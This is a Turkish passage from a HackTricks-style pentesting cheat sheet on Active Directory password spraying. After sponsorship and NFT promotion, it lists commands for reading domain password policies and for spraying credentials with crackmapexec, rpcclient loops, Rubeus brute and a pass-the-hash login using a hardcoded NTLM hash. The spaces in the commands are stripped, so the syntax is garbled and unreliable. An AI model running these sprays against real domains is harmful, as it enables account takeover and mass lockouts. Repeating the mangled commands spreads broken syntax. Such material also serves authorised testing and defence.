Şirketinizi HackTricks'te reklamını görmek istiyorsanız veya HackTricks'i PDF olarak indirmek istiyorsanız [ABONELİK PLANLARI]'na göz atın (https://github.com/sponsors/carlospolop)!
[The PEASS Family]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [NFT'lerimiz]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu
Birkaç geçerli kullanıcı adı bulduktan sonra, her bir keşfedilen kullanıcı için en sık kullanılan parolaları deneyebilirsiniz (ortamın parola politikasını göz önünde bulundurun).
Varsayılan olarakminimumparolauzunluğu7'dir.
Birkaç yanlış parola denerseniz bazı hesapları kilitliyor olabileceğinizi unutmayın (varsayılan olarak 10'dan fazla).
Parola politikasını al
Eğer bazı kullanıcı kimlik bilgileriniz veya bir etki alanı kullanıcısı olarak bir kabuğunuz varsa, parola politikasını alabilirsiniz:
# From Linuxcrackmapexec<IP>-u'user'-p'password'--pass-polenum4linux-u'username'-p'password'-P<IP>rpcclient-U""-N10.10.10.10;rpcclient $>querydominfoldapsearch-h10.10.10.10-x-b"DC=DOMAIN_NAME,DC=LOCAL"-ssub"*"|grep-m1-B10pwdHistoryLength# From Windowsnetaccounts(Get-DomainPolicy)."SystemAccess"#From powerview
Linux (veya tümü) üzerinden Sömürü
crackmapexec kullanarak:
crackmapexecsmb<IP>-uusers.txt-ppasswords.txt# Local Auth Spray (once you found some local admin pass or hash)## --local-auth flag indicate to only try 1 time per machinecrackmapexecsmb--local-auth10.10.10.10/23-uadministrator-H10298e182387f9cab376ecd08491764a0|grep+
# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/for u in$(catusers.txt); dorpcclient-U"$u%Welcome1"-c"getusername;quit"10.10.10.10|grepAuthority;done
# with a list of users.\Rubeus.exe brute/users:<users_file>/passwords:<passwords_file>/domain:<domain_name>/outfile:<output_file># check passwords for all users in current domain.\Rubeus.exe brute/passwords:<passwords_file>/outfile:<output_file>
Invoke-DomainPasswordSpray ile (Varsayılan olarak etki alanından kullanıcılar oluşturabilir ve şifre politikasını etki alanından alabilir ve denemeleri buna göre sınırlayabilir):